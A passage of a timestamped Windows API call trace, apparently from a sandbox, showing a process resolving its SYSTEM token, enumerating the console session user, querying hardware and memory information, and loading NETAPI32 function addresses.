dwFlags=0x0, lpMem=0x9d490 | out: hHeap=0x60000) returned 1 [0058.124] LoadStringW (in: hInstance=0x7fef1ca0000, uID=0x3e, lpBuffer=0xdfd820, cchBufferMax=256 | out: lpBuffer="Base Board") returned 0xa [0058.125] lstrlenW (lpString="Dell") returned 4 [0058.125] lstrlenW (lpString="0D61XP") returned 6 [0058.126] lstrlenW (lpString="A00") returned 3 [0058.126] lstrlenW (lpString="..CN747510BO0504.") returned 17 [0058.128] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x4) returned 0x9da70 [0058.128] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9da70, pulNumLanguages=0xdfe240 | out: pulNumLanguages=0xdfe240) returned 1 [0058.128] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da70 | out: hHeap=0x60000) returned 1 [0058.139] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0058.144] SetLastError (dwErrCode=0x0) [0058.144] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da50 [0058.144] SetLastError (dwErrCode=0x0) [0058.144] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da50, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da50, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da70 [0058.144] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da50 | out: hHeap=0x60000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x14) returned 0x9d490 [0058.144] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9d490, pulNumLanguages=0xdfe248 | out: pulNumLanguages=0xdfe248) returned 1 [0058.144] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9d490 | out: hHeap=0x60000) returned 1 [0058.152] memcpy (in: _Dst=0xdfd980, _Src=0x7fef1debbf0, _Size=0x20 | out: _Dst=0xdfd980) returned 0xdfd980 [0058.153] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management", ulOptions=0x0, samDesired=0x20019, phkResult=0xdfd500 | out: phkResult=0xdfd500*=0x25c) returned 0x0 [0058.153] RegQueryValueExW (in: hKey=0x25c, lpValueName="PagingFiles", lpReserved=0x0, lpType=0x0, lpData=0xdfd950, lpcbData=0xdfd4f8*=0x2c | out: lpType=0x0, lpData=0xdfd950*=0x3f, lpcbData=0xdfd4f8*=0x22) returned 0x0 [0058.153] RegCloseKey (hKey=0x25c) returned 0x0 [0058.153] GetCurrentThread () returned 0xfffffffffffffffe [0058.153] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0xdfd3c8 | out: TokenHandle=0xdfd3c8*=0x25c) returned 1 [0058.153] GetTokenInformation (in: TokenHandle=0x25c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdfd3c0 | out: TokenInformation=0x0, ReturnLength=0xdfd3c0) returned 0 [0058.153] GetLastError () returned 0x7a [0058.153] malloc (_Size=0x1c) returned 0x2c31a0 [0058.153] GetTokenInformation (in: TokenHandle=0x25c, TokenInformationClass=0x1, TokenInformation=0x2c31a0, TokenInformationLength=0x1c, ReturnLength=0xdfd3c0 | out: TokenInformation=0x2c31a0, ReturnLength=0xdfd3c0) returned 1 [0058.153] IsValidSid (pSid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0058.153] GetLengthSid (pSid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc [0058.153] malloc (_Size=0xc) returned 0x2bf160 [0058.153] CopySid (in: nDestinationSidLength=0xc, pDestinationSid=0x2bf160, pSourceSid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2bf160*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0058.153] GetSidIdentifierAuthority (pSid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2c31b2 [0058.153] malloc (_Size=0x18) returned 0x2beee0 [0058.153] _ultow (in: _Dest=0x5, _Radix=14668144 | out: _Dest=0x5) returned="5" [0058.154] malloc (_Size=0x18) returned 0x2bef60 [0058.154] malloc (_Size=0x18) returned 0x2befc0 [0058.154] GetProcAddress (hModule=0x7feff2d0000, lpProcName=0x7) returned 0x7feff2d1020 [0058.154] SysStringLen (param_1="S-1-") returned 0x4 [0058.154] SysStringLen (param_1="5") returned 0x1 [0058.154] GetProcAddress (hModule=0x7feff2d0000, lpProcName=0x96) returned 0x7feff2d4450 [0058.154] memcpy (in: _Dst=0x1217a8, _Src=0x121628, _Size=0xa | out: _Dst=0x1217a8) returned 0x1217a8 [0058.154] memcpy (in: _Dst=0x1217b0, _Src=0xc6f18, _Size=0x4 | out: _Dst=0x1217b0) returned 0x1217b0 [0058.154] free (_Block=0x2beee0) [0058.154] free (_Block=0x2bef60) [0058.154] GetSidSubAuthorityCount (pSid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2c31b1 [0058.154] GetSidSubAuthority (pSid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2c31b8 [0058.154] _ultow (in: _Dest=0x12, _Radix=14668144 | out: _Dest=0x12) returned="18" [0058.154] malloc (_Size=0x18) returned 0x2bef60 [0058.154] malloc (_Size=0x18) returned 0x2beee0 [0058.154] SysStringLen (param_1="S-1-5") returned 0x5 [0058.154] SysStringLen (param_1="-") returned 0x1 [0058.154] memcpy (in: _Dst=0xc6f18, _Src=0x1217a8, _Size=0xc | out: _Dst=0xc6f18) returned 0xc6f18 [0058.154] memcpy (in: _Dst=0xc6f22, _Src=0x121628, _Size=0x4 | out: _Dst=0xc6f22) returned 0xc6f22 [0058.154] free (_Block=0x2befc0) [0058.155] free (_Block=0x2bef60) [0058.155] malloc (_Size=0x18) returned 0x2bef60 [0058.155] malloc (_Size=0x18) returned 0x2befc0 [0058.155] SysStringLen (param_1="S-1-5-") returned 0x6 [0058.155] SysStringLen (param_1="18") returned 0x2 [0058.155] memcpy (in: _Dst=0x121628, _Src=0xc6f18, _Size=0xe | out: _Dst=0x121628) returned 0x121628 [0058.155] memcpy (in: _Dst=0x121634, _Src=0x1217a8, _Size=0x6 | out: _Dst=0x121634) returned 0x121634 [0058.155] free (_Block=0x2beee0) [0058.155] free (_Block=0x2bef60) [0058.155] SysStringLen (param_1="S-1-5-18") returned 0x8 [0058.155] malloc (_Size=0x12) returned 0x2bef60 [0058.155] free (_Block=0x2befc0) [0058.155] malloc (_Size=0x18) returned 0x2befc0 [0058.155] free (_Block=0x2bef60) [0058.155] GetProcAddress (hModule=0x7feff060000, lpProcName="LookupAccountSidW") returned 0x7feff07b898 [0058.155] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0xdfd234, ReferencedDomainName=0x0, cchReferencedDomainName=0xdfd230, peUse=0xdfd360 | out: Name=0x0, cchName=0xdfd234, ReferencedDomainName=0x0, cchReferencedDomainName=0xdfd230, peUse=0xdfd360) returned 0 [0058.156] GetLastError () returned 0x7a [0058.156] malloc (_Size=0xe) returned 0x2bef60 [0058.156] malloc (_Size=0x1a) returned 0x2c31d0 [0058.156] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2c31b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2bef60, cchName=0xdfd234, ReferencedDomainName=0x2c31d0, cchReferencedDomainName=0xdfd230, peUse=0xdfd360 | out: Name="SYSTEM", cchName=0xdfd234, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0xdfd230, peUse=0xdfd360) returned 1 [0058.157] malloc (_Size=0x18) returned 0x2beee0 [0058.157] malloc (_Size=0x18) returned 0x2bef80 [0058.157] free (_Block=0x2bef60) [0058.157] free (_Block=0x2c31d0) [0058.157] free (_Block=0x0) [0058.157] IsValidSid (pSid=0x2bf160*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0058.157] GetLengthSid (pSid=0x2bf160*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc [0058.157] malloc (_Size=0xc) returned 0x2bef60 [0058.157] CopySid (in: nDestinationSidLength=0xc, pDestinationSid=0x2bef60, pSourceSid=0x2bf160*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2bef60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0058.157] free (_Block=0x2bf160) [0058.157] free (_Block=0x2c31a0) [0058.157] IsValidSid (pSid=0x2bef60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0058.157] free (_Block=0x0) [0058.157] IsValidSid (pSid=0x2bef60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0058.157] GetLengthSid (pSid=0x2bef60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc [0058.157] malloc (_Size=0xc) returned 0x2bf160 [0058.157] CopySid (in: nDestinationSidLength=0xc, pDestinationSid=0x2bf160, pSourceSid=0x2bef60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2bf160*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0058.157] CloseHandle (hObject=0x25c) returned 1 [0058.157] CloseHandle (hObject=0xfffffffffffffffe) returned 0 [0058.157] free (_Block=0x2bef60) [0058.157] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0058.157] LoadLibraryA (lpLibFileName="WTSAPI32.dll") returned 0x7fefb550000 [0058.161] GetProcAddress (hModule=0x7fefb550000, lpProcName="WTSEnumerateSessionsW") returned 0x7fefb551430 [0058.161] WTSEnumerateSessionsW (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0xdfd308, pCount=0xdfd3c8 | out: ppSessionInfo=0xdfd308, pCount=0xdfd3c8) returned 1 [0058.170] GetProcAddress (hModule=0x7fefb550000, lpProcName="WTSQuerySessionInformationW") returned 0x7fefb55160c [0058.170] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x5, ppBuffer=0xdfd320, pBytesReturned=0xdfd3c0 | out: ppBuffer=0xdfd320*="kEecfMwgj", pBytesReturned=0xdfd3c0) returned 1 [0058.171] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x7, ppBuffer=0xdfd310, pBytesReturned=0xdfd3c0 | out: ppBuffer=0xdfd310*="Q9IATRKPRH", pBytesReturned=0xdfd3c0) returned 1 [0058.171] WTSQuerySessionInformationW (in: hServer=0x0, SessionId=0x1, WTSInfoClass=0x6, ppBuffer=0xdfd318, pBytesReturned=0xdfd3c0 | out: ppBuffer=0xdfd318*="Console", pBytesReturned=0xdfd3c0) returned 1 [0058.172] _wcsicmp (_String1="Console", _String2="Console") returned 0 [0058.172] GetProcAddress (hModule=0x7feff060000, lpProcName="LookupAccountNameW") returned 0x7feff06ded4 [0058.172] LookupAccountNameW (in: lpSystemName="", lpAccountName="Q9IATRKPRH\\kEecfMwgj", Sid=0x0, cbSid=0xdfd228, ReferencedDomainName=0x0, cchReferencedDomainName=0xdfd298, peUse=0xdfd348 | out: Sid=0x0, cbSid=0xdfd228, ReferencedDomainName=0x0, cchReferencedDomainName=0xdfd298, peUse=0xdfd348) returned 0 [0058.174] GetLastError () returned 0x7a [0058.174] malloc (_Size=0x1c) returned 0x2c3200 [0058.174] malloc (_Size=0x16) returned 0x2bef60 [0058.174] LookupAccountNameW (in: lpSystemName="", lpAccountName="Q9IATRKPRH\\kEecfMwgj", Sid=0x2c3200, cbSid=0xdfd228, ReferencedDomainName=0x2bef60, cchReferencedDomainName=0xdfd298, peUse=0xdfd348 | out: Sid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), cbSid=0xdfd228, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0xdfd298, peUse=0xdfd348) returned 1 [0058.174] GetSidIdentifierAuthority (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 0x2c3202 [0058.174] GetSidSubAuthorityCount (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 0x2c3201 [0058.174] GetSidSubAuthority (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), nSubAuthority=0x0) returned 0x2c3208 [0058.175] GetSidSubAuthority (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), nSubAuthority=0x1) returned 0x2c320c [0058.175] GetSidSubAuthority (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), nSubAuthority=0x2) returned 0x2c3210 [0058.175] GetSidSubAuthority (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), nSubAuthority=0x3) returned 0x2c3214 [0058.175] GetSidSubAuthority (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), nSubAuthority=0x4) returned 0x2c3218 [0058.175] malloc (_Size=0x18) returned 0x2bef20 [0058.175] malloc (_Size=0x18) returned 0x2bf180 [0058.175] malloc (_Size=0x18) returned 0x2bf1a0 [0058.175] free (_Block=0x2bef60) [0058.175] IsValidSid (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 1 [0058.175] free (_Block=0x0) [0058.175] IsValidSid (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 1 [0058.175] GetLengthSid (pSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 0x1c [0058.175] malloc (_Size=0x1c) returned 0x2c3230 [0058.176] CopySid (in: nDestinationSidLength=0x1c, pDestinationSid=0x2c3230, pSourceSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)) | out: pDestinationSid=0x2c3230*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 1 [0058.176] free (_Block=0x2c3200) [0058.176] GetProcAddress (hModule=0x7fefb550000, lpProcName="WTSFreeMemory") returned 0x7fefb5511b4 [0058.176] WTSFreeMemory (pMemory=0xf27b0) [0058.176] WTSFreeMemory (pMemory=0xf27f0) [0058.176] WTSFreeMemory (pMemory=0xf27d0) [0058.176] WTSFreeMemory (pMemory=0xed410) [0058.176] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7fef1cde8c8 [0058.176] free (_Block=0x0) [0058.176] IsValidSid (pSid=0x2c3230*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 1 [0058.176] GetLengthSid (pSid=0x2c3230*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 0x1c [0058.176] malloc (_Size=0x1c) returned 0x2c3200 [0058.176] CopySid (in: nDestinationSidLength=0x1c, pDestinationSid=0x2c3200, pSourceSid=0x2c3230*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)) | out: pDestinationSid=0x2c3200*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 1 [0058.176] free (_Block=0x2c3230) [0058.176] free (_Block=0x2c3200) [0058.177] free (_Block=0x2bf1a0) [0058.177] free (_Block=0x2bf180) [0058.177] free (_Block=0x2bef20) [0058.177] free (_Block=0x2bf160) [0058.177] free (_Block=0x2bef80) [0058.177] free (_Block=0x2beee0) [0058.177] free (_Block=0x2befc0) [0058.177] malloc (_Size=0x98) returned 0x2c13b0 [0058.177] LoadLibraryW (lpLibFileName="KERNEL32.DLL") returned 0x77160000 [0058.177] GetProcAddress (hModule=0x77160000, lpProcName="GetDiskFreeSpaceExW") returned 0x7716ac60 [0058.177] GetProcAddress (hModule=0x77160000, lpProcName="GetVolumePathNameW") returned 0x7716f9d0 [0058.177] GetProcAddress (hModule=0x77160000, lpProcName="CreateToolhelp32Snapshot") returned 0x77161c10 [0058.177] GetProcAddress (hModule=0x77160000, lpProcName="Thread32First") returned 0x771aae50 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="Thread32Next") returned 0x771aad60 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="Process32First") returned 0x771bfea0 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="Process32Next") returned 0x771bfdb0 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="Module32First") returned 0x771bfc90 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="Module32Next") returned 0x771bfb70 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="Heap32ListFirst") returned 0x771ab0b0 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="GlobalMemoryStatusEx") returned 0x77167f90 [0058.178] GetProcAddress (hModule=0x77160000, lpProcName="GetSystemDefaultUILanguage") returned 0x771634c0 [0058.178] malloc (_Size=0x18) returned 0x2befc0 [0058.178] GlobalMemoryStatusEx (in: lpBuffer=0xdfd5a0 | out: lpBuffer=0xdfd5a0) returned 1 [0058.179] malloc (_Size=0x48) returned 0x2bd310 [0058.179] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfd2b8 | out: lpSystemTimeAsFileTime=0xdfd2b8*(dwLowDateTime=0x30ace580, dwHighDateTime=0x1d92f76)) [0058.179] SetEvent (hEvent=0x1fc) returned 1 [0058.179] GetTimeZoneInformation (in: lpTimeZoneInformation=0xdfd640 | out: lpTimeZoneInformation=0xdfd640) returned 0x1 [0058.189] DevObjCreateDeviceInfoList () returned 0xc4e40 [0058.189] DevObjGetClassDevs () returned 0x1 [0058.191] DevObjEnumDeviceInfo () returned 0x0 [0058.191] DevObjDestroyDeviceInfoList () returned 0x1 [0058.191] GetSystemInfo (in: lpSystemInfo=0xdfd5e0 | out: lpSystemInfo=0xdfd5e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0058.192] GetLogicalProcessorInformationEx (in: RelationshipType=0x3, Buffer=0x0, ReturnedLength=0xdfd4c0 | out: Buffer=0x0, ReturnedLength=0xdfd4c0) returned 0 [0058.192] GetLastError () returned 0x7a [0058.192] malloc (_Size=0x30) returned 0x2c2580 [0058.192] GetLogicalProcessorInformationEx (in: RelationshipType=0x3, Buffer=0x2c2580, ReturnedLength=0xdfd4c0 | out: Buffer=0x2c2580, ReturnedLength=0xdfd4c0) returned 1 [0058.192] GetActiveProcessorCount (GroupNumber=0xffff) returned 0x4 [0058.192] GetSystemMetrics (nIndex=67) returned 0 [0058.193] lstrlenW (lpString="Dell") returned 4 [0058.193] lstrlenW (lpString="C6100") returned 5 [0058.194] LoadLibraryA (lpLibFileName="POWRPROF.dll") returned 0x7fefb170000 [0058.201] GetProcAddress (hModule=0x7fefb170000, lpProcName="PowerDeterminePlatformRole") returned 0x7fefb1713d0 [0058.201] PowerDeterminePlatformRole () returned 0x0 [0058.204] GetComputerNameExW (in: NameType=0x1, lpBuffer=0x2c260c, nSize=0xdfd1c8 | out: lpBuffer="Q9iATrkPrH", nSize=0xdfd1c8) returned 1 [0058.206] malloc (_Size=0x178) returned 0x2c1a80 [0058.206] LoadLibraryW (lpLibFileName="NETAPI32.DLL") returned 0x7fefb420000 [0058.212] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetGroupEnum") returned 0x7fefb3d8f00 [0058.214] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetGroupGetInfo") returned 0x7fefb3d20e0 [0058.214] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetGroupSetInfo") returned 0x7fefb3d9884 [0058.214] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetLocalGroupGetInfo") returned 0x7fefb3d2000 [0058.214] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetLocalGroupSetInfo") returned 0x7fefb3dad20 [0058.214] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetGroupGetUsers") returned 0x7fefb3d951c [0058.214] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetLocalGroupGetMembers") returned 0x7fefb3d2210 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetLocalGroupEnum") returned 0x7fefb3da860 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareEnum") returned 0x7fefcfc1ad4 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareGetInfo") returned 0x7fefcfc1f20 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareAdd") returned 0x7fefcfc3bf8 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareEnumSticky") returned 0x7fefcfc4230 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareSetInfo") returned 0x7fefcfc4440 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareDel") returned 0x7fefcfc3fa4 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareDelSticky") returned 0x7fefcfc4140 [0058.215] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetShareCheck") returned 0x7fefcfc3ebc [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetUserEnum") returned 0x7fefb3d63a0 [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetUserGetInfo") returned 0x7fefb3d1354 [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetUserSetInfo") returned 0x7fefb3d68bc [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetGroupEnum") returned 0x7fefb3d8f00 [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetApiBufferFree") returned 0x7fefb411010 [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetQueryDisplayInformation") returned 0x7fefb3d5710 [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetServerSetInfo") returned 0x7fefcfc489c [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetServerGetInfo") returned 0x7fefcfc1968 [0058.216] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetGetDCName") returned 0x7fefc8b7b14 [0058.218] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetWkstaGetInfo") returned 0x7fefb421430 [0058.218] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetGetAnyDCName") returned 0x7fefc8bcd4c [0058.219] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetServerEnum") returned 0x7fef6fa2cd0 [0058.220] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetUserModalsGet") returned 0x7fefb3d72f0 [0058.220] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetScheduleJobAdd") returned 0x7fefac31cf4 [0058.222] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetScheduleJobDel") returned 0x7fefac31dd8 [0058.222] 